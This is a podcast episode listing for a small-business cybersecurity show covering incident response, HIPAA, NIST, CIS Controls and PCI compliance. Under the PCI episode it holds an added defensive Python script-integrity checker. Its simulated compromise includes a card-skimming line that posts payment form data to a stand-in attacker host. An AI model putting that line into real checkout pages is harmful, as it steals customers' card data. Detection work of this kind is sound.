Practical Cybersecurity with Jen Stone

SecurityMetrics

Practical Cybersecurity, hosted by Jen Stone (MCIS, CISSP, CISA, QSA), is the bridge between complex security frameworks and real-world business implementation. Whether you are a "Jack of all trades" IT manager or a business leader with limited resources, this show provides the roadmap to a defensible security posture. 

  1. 1D AGO · BONUS

    Pressure Testing Your IRP: Why "Calling IT" Isn't a Plan (Part 2)

    What happens when the news cameras show up and your business grinds to a halt? Donna Grindle, CEO of Kardon, returns to discuss the "hair on fire" reality of a data breach. We move past the paperwork to explore why "calling IT" isn't a plan, the hidden costs of notification letters, and how insurance mazes can complicate your recovery.

    Key Takeaways
    - "Call IT" is not a plan: during a breach, IT will be busy containing the threat; you need an operational plan for when systems and phones go dark.
    - The paperwork trap: reverting to paper records stops cash flow because you aren't sending claims or bills, and you eventually have to re-enter all of that data by hand.
    - Media and legal circus: if a breach affects more than 500 individuals, HIPAA requires you to notify prominent media outlets, which often triggers immediate "ambulance chaser" lawsuits advertised on social media.
    - Tabletop exercises: don't find the gaps in your plan during a crisis. Run practice drills so you know who is authorized to speak for the company and which vendors to call.
    - Insurance realities: open claims immediately to protect legal privilege, but be ready for insurance-mandated vendors that may be several time zones away.

    "Take ownership of it. Don't assume that somebody else in your office is handling it... You will likely lose your business or be on the verge of it if you are not prepared in some way." — Donna Grindle

    Key Concepts
    - Security incident vs. data breach: a security incident is an event (often a panic-inducing one) that requires investigation; it may or may not escalate into a data breach that triggers regulatory reporting.
    - Incident Response Plan (IRP): a strategy that covers far more than IT recovery; it must dictate how you communicate with employees, vendors, and clients during a crisis.
    - Tabletop exercise: a low-stakes practice run of your IRP to poke holes in it before an actual emergency. It establishes exactly who is in charge, whom you are calling, and who is authorized to speak publicly.

    Links
    Kardon: https://kardonhq.com/
    Help Me With HIPAA Podcast: https://helpmewithhipaa.com/

    Timestamps
    00:00 – Intro
    00:54 – Cyber Incidents vs Breaches in a HIPAA Context
    01:26 – Why Operational Continuity Cannot be an IT Responsibility
    03:02 – Questions to Ask During a Tabletop Exercise
    03:50 – Talking to Patients on Facebook
    04:06 – More Questions to Ask During a Cyber Incident
    05:13 – Even "Calling My MSP" Isn't an Incident Response Plan
    05:37 – When a Cyber Incident Becomes a Breach
    06:09 – "Can't We Just Send a Postcard?"
    06:32 – Steps to Respond to a HIPAA Breach
    09:03 – Final Summary: Shifting to Active Security Ownership
    09:59 – Where to Find Donna Grindle & Kardon

    A note from Jen: We built Practical Cybersecurity because we were tired of the fear-mongering in this industry. Security shouldn't be a secret club. If you're trying to figure out PCI compliance or need a pen test, my team at SecurityMetrics can help you out: https://www.securitymetrics.com/contact/lets-get-you-to-the-right-place But if you just want to learn how to protect yourself for free, start here: https://academy.securitymetrics.com/

    11 min
  2. 1D AGO

    Why Your Security Risk Analysis is Probably Wrong (Part 1)

    Are your IT or cloud providers handling your security? Does your site claim you're "HIPAA Compliant"? Donna Grindle, CEO of Kardon and co-host of Help Me With HIPAA, delivers a massive reality check for small business owners. We break down the difference between a gap analysis and a true Security Risk Analysis (SRA), why IT speaks a different language from management, and how the "CREMATE" method finds your data.

    Key Takeaways
    - Responsibility can't be outsourced: cloud apps and IT companies don't make you secure; you can outsource liability, not responsibility.
    - Real SRA vs. gap analysis: if your risk analysis doesn't rate likelihood and impact and set a treatment strategy for each risk, it's just a gap analysis, and you're exposed.
    - CREMATE your data: map PHI by tracking where you Create, Receive, Maintain, and Transmit it.
    - Business Associates (BAs): if unauthorized access by a vendor would count as a breach, that vendor is a BA.
    - Documentation and AI: use AI to draft policies from your bullet points, but treat it like a fallible assistant and always verify the output.
    - Frameworks: use HICP 405(d) to get IT and management speaking the same security language.

    "If you put on your website that you're HIPAA compliant, immediately I'm concerned." — Donna Grindle

    Links
    Kardon: https://kardonhq.com
    Help Me With HIPAA Podcast: https://helpmewithhipaa.com/
    HHS Website: https://www.hhs.gov/about/agencies/asa/ocio/cybersecurity/security-awareness-training/index.html
    HICP 405(d) Guidelines: https://405d.hhs.gov/

    Timestamps
    0:00 – Why a "HIPAA Compliant" Badge is a Red Flag
    1:26 – Understanding HIPAA Covered Entities & Obligations
    2:14 – The Difference Between Awareness Training and Security
    3:18 – Why Your SRA Might Just Be a Gap Analysis
    4:40 – Building an Inventory: You Can't Protect What You Don't Find
    6:22 – Using the "CREMATE" Method for Data Mapping
    8:21 – Why IT Cannot Be the "Department of No"
    9:40 – Standardizing Communication with the HICP 405(d) Framework
    10:41 – How to Document Your Policies (and Use AI to Help)
    12:39 – The Easy Way to Tell if a Partner is a Business Associate
    13:50 – Business Associate Red Flags

    15 min
  3. MAR 3

    Is NIST Too Complex for Small Businesses? Daniel Eliot Weighs In

    "I can't think about cybersecurity this week; I'm thinking about 1099s." You're not alone. Many SMBs see the NIST Cybersecurity Framework (CSF) as an overwhelming manual for government contractors, not for a local shop or a startup.

    Jen Stone sits down with Daniel Eliot, NIST's lead for small business engagement. We break down the new NIST CSF 2.0 Small Business Quick Start Guide, a "small-chunk" resource designed to help under-resourced organizations move from chaos to a structured program.

    In this episode:
    - Why making "everyone" responsible means "nobody" is.
    - How to build a "reasonable" security program while managing payroll and daily operations.
    - Why taking security seriously helps you win bigger contracts and scale safely.
    - The exact steps (MFA, patching, backups, and more) that even large organizations get wrong.

    NIST Resources
    NIST (National Institute of Standards and Technology): https://www.nist.gov/
    Small Business Cybersecurity Corner: https://www.nist.gov/itl/smallbusinesscyber
    NIST CSF 2.0 (Cybersecurity Framework): https://www.nist.gov/cyberframework
    Small Business Quick Start Guide: https://www.nist.gov/publications/nist-cybersecurity-framework-20-small-business-quick-start-guide
    Contact Daniel and his team: smallbizsecurity@nist.gov

    Key Term Definitions
    - The 6 Functions: Govern, Identify, Protect, Detect, Respond, and Recover, the top-level structure of CSF 2.0.
    - MFA: Multi-Factor Authentication, essential for account access.
    - Patching: updating software to fix security "holes."
    - MSP/MSSP: Managed (Security) Service Provider, local experts you can hire to manage IT and security for you.

    Timestamps
    00:00 – Many hats of small business owners
    00:26 – Daniel Eliot and NIST's Mission
    02:25 – Exploring the Small Business Cybersecurity Corner
    03:20 – What is the NIST CSF?
    04:26 – The Small Business Quick Start Guide for CSF 2.0
    06:52 – How to Identify Your Most Critical Assets
    09:56 – When to Seek Help: Engaging MSPs and Local Resources
    10:52 – Defining a "Successful" Cybersecurity Program
    13:21 – Essential Fundamentals: MFA, Patching, and Backups
    15:35 – How to Engage Directly with NIST

    Jen Stone (MCIS, CISSP, CISA, QSA) is a Principal Security Analyst at SecurityMetrics. With 25+ years in IT and 100+ high-level assessments, Jen specializes in making complex compliance actionable for businesses of all sizes. Outside of security, she is an aerial arts enthusiast and motorcycle rider.

    17 min
  4. FEB 17

    "Good Enough" Security for Small Business Budgets

    In this episode of Practical Cybersecurity, host Jen Stone talks with Curt Dukes, EVP and GM of Security Best Practices at the Center for Internet Security (CIS). Drawing on his 30-year career at the NSA, Dukes breaks down how small and medium businesses (SMBs) can implement "good enough" security without unlimited resources. The conversation focuses on Implementation Group 1 (IG1), the prioritized set of CIS Controls safeguards that provides essential cyber hygiene. Dukes introduces free resources such as the CSAT (Controls Self-Assessment Tool) and CIS Workbench to help leaders move past the intimidation of technical jargon and establish a "standard of reasonableness" for their organization's defenses.

    CIS Resources
    - CIS (Center for Internet Security): the nonprofit organization that creates the global standards discussed in this episode.
    - NSA (National Security Agency): the U.S. intelligence agency where Curt Dukes led defensive security efforts for 30+ years.
    - IG1 (Implementation Group 1): the essential cyber hygiene tier of the CIS Controls, designed for small businesses.
    - CSAT (Controls Self-Assessment Tool): a free web-based application to track and measure your progress against the Controls.
    - CIS Workbench: a collaborative platform to ask technical questions and get help from the security community.
    - CIS RAM (Risk Assessment Method): a free methodology to identify security gaps and prioritize investments based on risk.
    - CIS Benchmarks: free, consensus-based configuration recommendations for operating systems and network devices.
    - MS-ISAC (Multi-State Information Sharing and Analysis Center): the division of CIS providing threat intelligence for state and local governments.
    - EI-ISAC (Elections Infrastructure ISAC): a dedicated team at CIS focused on securing election-related systems.
    - The Community Defense Model (CDM): a data-driven report showing the effectiveness of the Controls against the most common attack types.
    - The Cost of Cyber Defense: a breakdown of the financial investment needed for various security models.

    16 min
  5. 12/02/2024

    New to PCI Compliance? Get the Support You Need | SecurityMetrics Podcast 106

    Are you a small or medium business owner? Did you just get a message from your bank telling you to call SecurityMetrics? Are you worried about having a bad experience? Do you know what PCI even means? This episode is for you. Learn how SecurityMetrics can help you navigate this regulatory landscape.

    We'll discuss:
    - Why your processor is making you do PCI compliance: did you know that nearly half of all cyberattacks target small businesses?
    - What calling into SecurityMetrics looks like: learn what information you need handy so you can get your compliance done as quickly as possible, and the questions you should ask to get the best service.
    - Support stories: discover how other small businesses have successfully leveraged SecurityMetrics to achieve compliance.
    - Tips and tricks: get practical advice on how to optimize your PCI compliance efforts and minimize risk, keeping your business and your customers more secure.

    Whether you're just starting your PCI compliance journey or looking to improve your existing processes, this episode provides valuable insights and actionable advice.

    44 min
  6. 10/23/2024

    Are you ready for the ecommerce security storm? A buyer’s guide to PCI DSS 11.6.1 and 6.4.3

    Join us for this extra-long episode as SecurityMetrics experts Jen Stone, Gary Glover, Aaron Willis and Chad Horton dive deep into the evolving landscape of PCI compliance for e-commerce businesses. With the deadline for PCI DSS v4.0's future-dated requirements approaching (they become mandatory on 31 March 2025), understanding the new e-commerce requirements is crucial. Requirement 6.4.3 calls for an inventory of every script loaded on a payment page, a method to confirm each one is authorized, and a method to assure its integrity; requirement 11.6.1 calls for a change- and tamper-detection mechanism that alerts on unauthorized modification of the security-impacting HTTP headers and the contents of payment pages as received by the consumer's browser.

    In this episode, our panelists discuss:
    - Understanding PCI DSS v4.0 for e-commerce: the key changes and their implications for your business, especially if you're a small or medium-sized enterprise.
    - Combatting e-commerce skimmers: how attackers skim card data from online transactions (typically by injecting malicious JavaScript into checkout pages) and the measures you can take to protect your customers' data.
    - The power of script analysis: how script scanning can identify unauthorized or modified scripts on your e-commerce website.
    - Securing dynamic content: the challenges of protecting websites whose content changes constantly.
    - Choosing the right security solution: the pros and cons of agent-based and agentless solutions, considering the specific needs of your business.

    Whether you're a seasoned PCI professional or just starting your compliance journey, this episode provides valuable insights to help you safeguard your e-commerce business and protect your customers' sensitive information.
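The kind of check 6.4.3 and 11.6.1 describe, as an added example rather than anything from the episode or SecurityMetrics' products: a Python script that parses the scripts on a checkout page, pins each one to a hash in an authorized inventory (the 6.4.3 baseline), then re-audits the page and its security-impacting headers for additions or changes (the 11.6.1 comparison). All hostnames, script bodies and headers are constructed for illustration, and fetching is simulated with dictionaries instead of HTTP requests.

```python
"""Added example, not SecurityMetrics' tooling: a script-inventory and tamper-detection check in
the spirit of PCI DSS v4.0 requirements 6.4.3 and 11.6.1. All hostnames, script bodies and headers
below are constructed, and "fetched" resources are plain dictionaries rather than HTTP responses."""
import base64
import hashlib
from html.parser import HTMLParser


class ScriptTagParser(HTMLParser):
    """Collects each <script>: external src, SRI integrity attribute, inline body."""
    def __init__(self):
        super().__init__()
        self.scripts, self._current = [], None

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            a = dict(attrs)
            self._current = {"src": a.get("src"), "integrity": a.get("integrity"), "body": ""}

    def handle_data(self, data):
        if self._current is not None:  # text inside an open <script>
            self._current["body"] += data

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._current is not None:
            self.scripts.append(self._current)
            self._current = None


def parse_scripts(html):
    parser = ScriptTagParser()
    parser.feed(html)
    return parser.scripts


def sri_sha384(content):
    """Subresource Integrity value: 'sha384-' + base64(SHA-384 digest of the bytes)."""
    return "sha384-" + base64.b64encode(hashlib.sha384(content).digest()).decode()


def build_inventory(html, resources, headers):
    """6.4.3 baseline: external scripts pinned by URL and body hash, inline scripts by hash,
    plus the security-impacting headers recorded for the 11.6.1 comparison."""
    inv = {"external": {}, "inline": set(), "headers": dict(headers)}
    for s in parse_scripts(html):
        if s["src"]:
            inv["external"][s["src"]] = sri_sha384(resources[s["src"]])
        else:
            inv["inline"].add(sri_sha384(s["body"].strip().encode()))
    return inv


def audit_page(html, resources, headers, inventory):
    """11.6.1 check of the page as a browser receives it; returns (kind, detail) findings."""
    findings = []
    for s in parse_scripts(html):
        if s["src"]:
            expected = inventory["external"].get(s["src"])
            if expected is None:
                findings.append(("unauthorized_script", s["src"]))
            elif s["src"] not in resources:
                findings.append(("unreachable_script", s["src"]))
            elif sri_sha384(resources[s["src"]]) != expected:
                # The authoritative hash is the inventory's, not the page's integrity attribute,
                # which an attacker who controls the origin can simply rewrite.
                findings.append(("tampered_script", s["src"]))
        elif sri_sha384(s["body"].strip().encode()) not in inventory["inline"]:
            findings.append(("unauthorized_inline_script", s["body"].strip()[:60]))
    for name, baseline in inventory["headers"].items():
        if headers.get(name) != baseline:
            findings.append(("header_changed", name))
    return findings


# Constructed checkout page: a first-party script, the payment provider's hosted-fields script,
# an inline tag-manager snippet, and a CSP that allows only those sources.
CHECKOUT_URL, PSP_URL = "https://shop.example/static/checkout.js", "https://psp.example/v1/fields.js"
SKIMMER_URL = "https://cdn-stats.example/a.js"
CHECKOUT_JS = b"document.getElementById('pay').addEventListener('submit', validateCard);"
PSP_JS = b"window.PSP = { mount: function (el) { /* hosted card fields */ } };"
INLINE_JS = "window.dataLayer = window.dataLayer || [];"
BASELINE_RESOURCES = {CHECKOUT_URL: CHECKOUT_JS, PSP_URL: PSP_JS}
BASELINE_HEADERS = {"Content-Security-Policy": "script-src 'self' https://psp.example"}


def script_tag(src, body=None):
    """External <script> tag, carrying an SRI attribute when the expected body is known."""
    integrity = "" if body is None else f' integrity="{sri_sha384(body)}"'
    return f'<script src="{src}"{integrity}></script>'


def render_page(tags):
    return "<html><head>" + "".join(tags) + f"<script>{INLINE_JS}</script></head><body><form id='pay'></form></body></html>"


def run_scenarios():
    """Authorize the clean page, then audit it after a simulated Magecart-style compromise: checkout.js
    gains an exfiltration call (the attacker, controlling the origin, re-signs its SRI attribute), a
    skimmer tag is added without SRI, and the CSP is loosened to permit it."""
    baseline_html = render_page([script_tag(u, b) for u, b in BASELINE_RESOURCES.items()])
    inventory = build_inventory(baseline_html, BASELINE_RESOURCES, BASELINE_HEADERS)
    clean = audit_page(baseline_html, BASELINE_RESOURCES, BASELINE_HEADERS, inventory)

    tampered = dict(BASELINE_RESOURCES)
    tampered[CHECKOUT_URL] = CHECKOUT_JS + b"\nfetch('https://cdn-stats.example/c', {method: 'POST', body: new FormData(document.forms.pay)});"
    tampered[SKIMMER_URL] = b"/* constructed stand-in for skimmer code */"
    tags = [script_tag(u, b) for u, b in tampered.items() if u != SKIMMER_URL] + [script_tag(SKIMMER_URL)]
    headers = {"Content-Security-Policy": BASELINE_HEADERS["Content-Security-Policy"] + " https://cdn-stats.example"}
    return clean, audit_page(render_page(tags), tampered, headers, inventory)


if __name__ == "__main__":
    for kind, detail in run_scenarios()[1]:
        print(f"{kind}: {detail}")
```

The constructed compromise shows why the authoritative hash has to live outside the page: an attacker who can alter checkout.js on the origin can also rewrite its integrity attribute, so the browser's SRI check passes while the inventory comparison still flags it, and the added third-party tag and the loosened Content-Security-Policy header are reported alongside it. A real deployment would fetch the page and its scripts the way a customer's browser does, either from outside (agentless) or from inside the page (agent-based), which is the trade-off the panel discusses.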

    1h 25m
  7. 09/25/2024

    Cybersecurity for Families: A Parent-Child Guide to Online Safety | SecurityMetrics Podcast 104

    Download the guide: https://www.cisecurity.org/insights/white-papers/from-both-sides-a-parental-guide-to-protecting-your-childs-online-activity

    Are you a parent looking for guidance on how to keep kids safe online? Join us for a candid conversation with Sean Atkinson, CISO at the Center for Internet Security, and his daughter, Emma, as they discuss their journey of creating a guide designed to help families have conversations about online safety.

    In this episode, you'll learn:
    - Why open communication is key: how Sean and Emma fostered an environment of trust and understanding around online safety.
    - Common online dangers: the risks your child may face, such as sharing personal information, cyberbullying, and meeting strangers online.
    - Practical tips for parents: actionable advice on how to set boundaries, have difficult conversations, and create a safe online space for your child.

    Whether you're a new parent or a seasoned digital native, this episode will help you start conversations and find resources to protect your child in the ever-evolving online world.

    27 min
Rating: 5 out of 5 (8 ratings)
